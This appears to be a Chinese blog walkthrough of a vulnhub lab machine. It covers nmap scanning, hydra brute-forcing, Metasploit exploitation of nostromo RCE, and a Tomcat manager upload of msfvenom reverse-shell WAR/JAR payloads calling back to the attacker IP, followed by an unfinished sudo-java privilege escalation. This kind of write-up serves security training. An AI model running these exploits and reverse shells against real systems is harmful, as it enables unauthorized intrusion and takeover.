一、信息收集
1、c段扫描,获取靶机IP
──(kali㉿kali)-[~] └─$ sudo nmap -sn 192.168.62.129/24 [sudo] password for kali: Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:55 HKT Nmap scan report for 192.168.62.1 Host is up (0.00026s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168.62.2 Host is up (0.00019s latency). MAC Address: 00:50:56:F4:60:0B (VMware) Nmap scan report for 192.168.62.130 Host is up (0.00047s latency). MAC Address: 00:0C:29:39:83:54 (VMware) Nmap scan report for 192.168.62.254 Host is up (0.00038s latency). MAC Address: 00:50:56:EB:19:29 (VMware) Nmap scan report for 192.168.62.129 Host is up. Nmap done: 256 IP addresses (5 hosts up) scanned in 2.05 seconds
因为对局域网内的IP较熟悉,所以知道192.168.62.130为新增靶机的IP地址。
2、靶机开放端口扫描
①tcp协议端口
┌──(kali㉿kali)-[~] └─$ sudo nmap --min-rate 10000 -p- 192.168.62.130 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-01 23:57 HKT Nmap scan report for 192.168.62.130 Host is up (0.0022s latency). Not shown: 65528 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 2222/tcp open EtherNetIP-1 3306/tcp open mysql 8009/tcp open ajp13 8080/tcp open http-proxy 8081/tcp open blackice-icecap MAC Address: 00:0C:29:39:83:54 (VMware) Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds
②udp协议端口
┌──(kali㉿kali)-[~] └─$ sudo nmap -sU --min-rate 10000 -p- 192.168.62.130 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 00:00 HKT Warning: 192.168.62.130 giving up on port because retransmission cap hit (10). Nmap scan report for 192.168.62.130 Host is up (0.00053s latency). All 65535 scanned ports on 192.168.62.130 are in ignored states. Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach) MAC Address: 00:0C:29:39:83:54 (VMware) Nmap done: 1 IP address (1 host up) scanned in 72.87 seconds
端口运行服务版本:
──(kali㉿kali)-[/usr/share/wordlists] └─$ sudo nmap -sV -sT -O -p22,80,2222,3306,8009,8080,8081 192.168.62.130 Starting Nmap 7.93 ( https://nmap.org ) at 2023-02-02 23:45 HKT Nmap scan report for 192.168.62.130 Host is up (0.00068s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0) 80/tcp open http Apache httpd 2.4.38 ((Debian)) 2222/tcp open http nostromo 1.9.6 3306/tcp open mysql MySQL (unauthorized) 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1 8081/tcp open http nginx 1.14.2 MAC Address: 00:0C:29:39:83:54 (VMware) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.6 Network Distance: 1 hop Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.39 seconds
二、getshell
1、22号端口渗透
①查询版本漏洞--无
──(kali㉿kali)-[/usr/share/wordlists] └─$ searchsploit OpenSSH 7.9p1 Debian 10+deb10u2 Exploits: No Results Shellcodes: No Results
②简单爆破--无
┌──(kali㉿kali)-[/usr/share/wordlists] └─$ hydra -l webserver -P rockyou.txt 192.168.62.130 ssh -f Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:38:46 [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4 [DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task [DATA] attacking ssh://192.168.62.130:22/ [ERROR] target ssh://192.168.62.130:22/ does not support password authentication (method reply 4).
3、2222端口利用
①搜索2222端口历史漏洞
msf6 > search nostromo Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/nostromo_code_exec
②发现一个RCE漏洞,尝试利用
msf6 > use 0 [*] Using configured payload cmd/unix/reverse_perl msf6 exploit(multi/http/nostromo_code_exec) > option [-] Unknown command: option msf6 exploit(multi/http/nostromo_code_exec) > options Module options (exploit/multi/http/nostromo_code_exec): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses. SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Payload options (cmd/unix/reverse_perl): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic (Unix In-Memory) View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nostromo_code_exec) > set rhosts 192.168.62.130
rhosts => 192.168.62.130
msf6 exploit(multi/http/nostromo_code_exec) > set rport 2222
rport => 2222
msf6 exploit(multi/http/nostromo_code_exec) > set lhost 192.168.62.129
lhost => 192.168.62.129
msf6 exploit(multi/http/nostromo_code_exec) > options
Module options (exploit/multi/http/nostromo_code_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.62.130 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 2222 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.62.129 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/nostromo_code_exec) > run
[*] Started reverse TCP handler on 192.168.62.129:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.168.62.129:4444 -> 192.168.62.130:53560) at 2023-02-05 18:05:01 +0800
id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
shell
[*] Trying to find binary 'python' on the target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary 'bash' on the target machine
[*] Found bash at /usr/bin/bash
id
id
uid=1(daemon) gid=1(daemon) groups=1(daemon),0(root)
daemon@webserver:/usr/bin$
获取到shell!!!!
4、3306端口渗透--此为个人尝试
①简单爆破--mysql中应该是开启了白名单功能
──(kali㉿kali)-[/usr/share/wordlists] └─$ hydra -l root -P rockyou.txt 192.168.62.130 mysql -f Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-02 23:41:25 [INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections) [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking mysql://192.168.62.130:3306/ [ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server [ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server [ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server [ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server [ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server [ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server [ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server [ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server [ERROR] Host '192.168.62.129' is not allowed to connect to this MySQL server
5、8008
6、8080端口利用
浏览器输入http://ip:port浏览计算机运行的服务,根据运行的tomcat服务找出其后台URL:
三、提权
1、收集系统信息
daemon@webserver:/usr/bin$ ls -l /etc/crontab ls -l /etc/crontab -rw-r--r-- 1 root root 1042 Oct 11 2019 /etc/crontab daemon@webserver:/usr/bin$ ls -l /etc/passwd ls -l /etc/passwd -rw-r--r-- 1 root root 1447 Mar 31 2020 /etc/passwd daemon@webserver:/usr/bin$ sudo -l sudo -l sudo: unable to resolve host webserver: Name or service not known We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility.
②find / -writable -type f 2>/dev/null|grep *users.xml
③发现tomcat后台登陆人员配置文件并查看,获得tomcat的后台用户名和密码
④登陆tomcat的后台,发现有文件上传的功能
⑤msfvenom制作木马
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=8888 -f jar > doit.war
⑥在tomcat后台将获取到的木马上传,设置成功后点击运行(点击红框中的名字)
⑦msf配置LHOST,LPORT,PAYLOAD(与制作密码时一致)监听木马设置的端口,然后运行
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.62.129 lhost => 192.168.62.129 msf6 exploit(multi/handler) > set lport 8888 lport => 8888 msf6 exploit(multi/handler) > set payload java/jsp_shell_ set payload java/jsp_shell_bind_tcp set payload java/jsp_shell_reverse_tcp msf6 exploit(multi/handler) > set payload java/jsp_shell_ set payload java/jsp_shell_bind_tcp set payload java/jsp_shell_reverse_tcp msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp payload => java/jsp_shell_reverse_tcp msf6 exploit(multi/handler) > run [*] Started reverse TCP handler on 192.168.62.129:8888 [*] Command shell session 1 opened (192.168.62.129:8888 -> 192.168.62.130:58322) at 2023-02-05 22:36:47 +0800 python -c 'import pty;pty.spawn("/bin/bash")' //利用python反弹shell
tomcat@webserver:~$
⑧查看tomcat用户的权限,发现可以使用root权限执行java服务。
tomcat@webserver:/tmp$ sudo -l sudo -l sudo: unable to resolve host webserver: Name or service not known Matching Defaults entries for tomcat on webserver: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User tomcat may run the following commands on webserver: (ALL) NOPASSWD: /usr/lib/jvm/adoptopenjdk-8-hotspot-amd64/bin/java
⑨msfvenom制作.jar格式木马
sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.62.129 LPORT=9999 -f jar >xiaoliyu.jar
⑩使用upload功能将木马上传到靶机(我这里不知道为啥upload功能用不了,所以使用scp命令复制文件)
⑪msf设置监听9999端口
msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp msf6 exploit(multi/handler) > set lhost 192.168.62.129 lhost => 192.168.62.129 msf6 exploit(multi/handler) > set lport 9999 lport => 9999 msf6 exploit(multi/handler) > set payload java/jsp_shell_ set payload java/jsp_shell_bind_tcp set payload java/jsp_shell_reverse_tcp msf6 exploit(multi/handler) > set payload java/jsp_shell_ set payload java/jsp_shell_bind_tcp set payload java/jsp_shell_reverse_tcp msf6 exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp payload => java/jsp_shell_reverse_tcp msf6 exploit(multi/handler) > run
⑫以root权限运行.jar格式文件(不知为啥我这里运行出错了,看网上说是文件传输过程中损坏了,试着使用sftp传输文件也无法运行,所以得找其他方法进行提权,正常的话执行⑬即为root权限了)
sudo -u root java -jar xiaoliyu.jar
⑬连接后使用python反弹shell,可以发现已经为root权限
未完待续
标签:multi,shell,62.129,exploit,192.168,webserver,vulnhub,tcp,my From: https://www.cnblogs.com/xiaoliyulixianji/p/17084564.html